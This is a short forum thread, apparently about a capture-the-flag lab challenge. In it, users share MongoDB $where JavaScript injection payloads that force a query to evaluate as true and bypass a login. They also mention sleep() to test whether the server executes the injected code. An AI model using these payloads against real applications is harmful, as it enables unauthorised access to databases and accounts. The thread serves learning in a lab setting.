Forum Discussion
Bronze IIITrick or Treat: Manor of Madness
This should nudge you in the right direction - MongoDB $where operator JavaScript injection - Web Application Vulnerabilities | Invicti
Bronze IIISure, the query i used is
$where":"this.name == '' && this.incantation == '';1==1"The aim was to discover you could use JavaScript injection to evaluate the query to true.
Bronze IIIHi Samh051,
This query worked for you in the last question?
immervivesolver{“$where":"this.name == ‘admin’||’1’==‘1’&& this.incantation == ‘admin’||’1’==‘1’“}
PRABAKARANRAMAMURTHY- PRABAKARANRAMAMURTHY
Thank you immervivesolver.
This worked:
{"$where":"this.name=='admin'||'1==1' && this.incantation =='admin'||'1==1'"}
- Samh051
It did, you would use sleep(x) just to test if the server executes the javascript. You would then try and evaluate the statement to true. the ; at the end is to complete the command and the 1=1 is there to make it true. Are you having problems with the command?
